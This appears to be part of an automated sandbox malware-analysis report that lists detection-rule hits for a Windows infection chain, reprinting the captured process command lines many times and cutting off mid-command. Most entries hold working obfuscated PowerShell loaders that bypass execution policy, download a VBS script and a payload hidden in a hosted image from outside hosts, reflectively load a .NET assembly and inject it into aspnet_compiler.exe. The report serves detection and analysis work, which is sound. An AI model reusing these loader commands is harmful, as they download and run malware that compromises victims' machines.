ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgI
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7948, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5816, ProcessName: aspnet_compiler.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", ProcessId: 7772, ProcessName: csc.exe
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\icgfugf, CommandLine: C:\Users\user\AppData\Roaming\icgfugf, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\icgfugf, NewProcessName: C:\Users\user\AppData\Roaming\icgfugf, OriginalFileName: C:\Users\user\AppData\Roaming\icgfugf, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\icgfugf, ProcessId: 7700, ProcessName: icgfugf
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7608, TargetFilename: C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7608, TargetFilename: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", CommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 